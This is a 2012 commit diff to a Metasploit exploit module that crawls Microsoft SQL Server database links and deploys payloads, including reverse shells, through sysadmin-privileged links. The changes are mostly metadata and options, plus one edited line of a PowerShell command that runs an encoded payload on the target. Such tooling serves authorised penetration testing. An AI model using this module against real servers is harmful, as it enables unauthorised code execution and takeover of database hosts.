Finalizing module

2012-12-24 11:13:51 -06:00 · 2012-12-24 11:13:51 -06:00 · 677b9718da
parent 53a2fda608
commit 677b9718da
1 changed files with 45 additions and 25 deletions
--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@ -1,3 +1,11 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+
 require 'msf/core'
 require 'msf/core/exploit/mssql_commands'

@ -10,32 +18,39 @@ class Metasploit3 < Msf::Exploit::Remote

 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Microsoft SQL Server - Database Link Crawler',
-			'Description'    => %q{This module can be used to crawl MS SQL Server
-			database links and deploy metasploit payloads through links configured
-			with sysadmin privileges using a valid SQL Server Login.  If you are
-			attempting to obtain multiple reverse shells using this module we
-			recommend setting the "DisablePayloadHandler" advanced option to "true",
-			and setting up a multi/handler to run in the background as a job to
-			support multiple incoming shells.  If you are interested in deploying
-			payloads to spefic servers this module also supports that functionality
-			via the "DEPLOYLIST" option.  Currently, the module is capable of
-			delivering payloads to both 32bit and 64bit Windows systems via
-			powershell memory injection methods based on Matthew Graeber's work.
-			As a result, the target server must have powershell installed.
-			By default, all of the crawl information is saved to a CSV formatted
-			log file and MSF loot so that the tool can also be used for auditing
-			without deploying payloads.},
+			'Name'           => 'Microsoft SQL Server Database Link Crawling Command Execution',
+			'Description'    => %q{
+					This module can be used to crawl MS SQL Server database links and deploy
+				Metasploit payloads through links configured with sysadmin privileges using a
+				valid SQL Server Login.
+
+					If you are attempting to obtain multiple reverse shells using this module we
+				recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
+				up a multi/handler to run in the background as a job to support multiple incoming
+				shells.
+
+					If you are interested in deploying payloads to spefic servers this module also
+				supports that functionality via the "DEPLOYLIST" option.
+
+					Currently, the module is capable of delivering payloads to both 32bit and 64bit
+				Windows systems via powershell memory injection methods based on Matthew Graeber's
+				work. As a result, the target server must have powershell installed. By default,
+				all of the crawl information is saved to a CSV formatted log file and MSF loot so
+				that the tool can also be used for auditing without deploying payloads.
+			},
 			'Author'         =>
 				[
-					'Antti Rantasaari <antti.rantasaari [at] netspi.com>',
-					'Scott Sutherland "nullbind" <scott.sutherland [at] netspi.com>'
+					'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
+					'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
 				],
 			'Platform'      => [ 'win' ],
 			'License'        => MSF_LICENSE,
-			'References'     => [[ 'URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
-								['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
-								['URL','http://www.exploit-monday.com/2011_10_16_archive.html']],
+			'References'     =>
+				[
+					['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
+					['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
+					['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
+				],
 			'Platform'       => 'win',
 			'DisclosureDate' => 'Jan 1 2000',
 			'Targets'        =>
@ -47,9 +62,14 @@ class Metasploit3 < Msf::Exploit::Remote

 		register_options(
 			[
-				OptBool.new('VERBOSE',  [false, 'Set how verbose the output should be', 'false']),
-				OptBool.new('DEPLOY',  [false, 'Deploy payload via the sysadmin links', 'false']),
-				OptString.new('DEPLOYLIST',  [false,'Comma seperated list of systems to deploy to']),
+				OptBool.new('DEPLOY',       [false, 'Deploy payload via the sysadmin links', 'false']),
+				OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
+				OptString.new('PASSWORD',   [true, 'The password for the specified username'])
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
 			], self.class)
 	end

@ -511,7 +531,7 @@ $winFunc::CreateThread(0,0,$x,0,0,0)"
 		# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
 		# If running on 64bit system, 32bit powershell called from syswow64
 		powershell_cmd =  "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
-		'*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
+		'*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
 		-noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
 		powershell_uni = Rex::Text.to_unicode(powershell_cmd)
 		powershell_64 = Rex::Text.encode_base64(powershell_uni)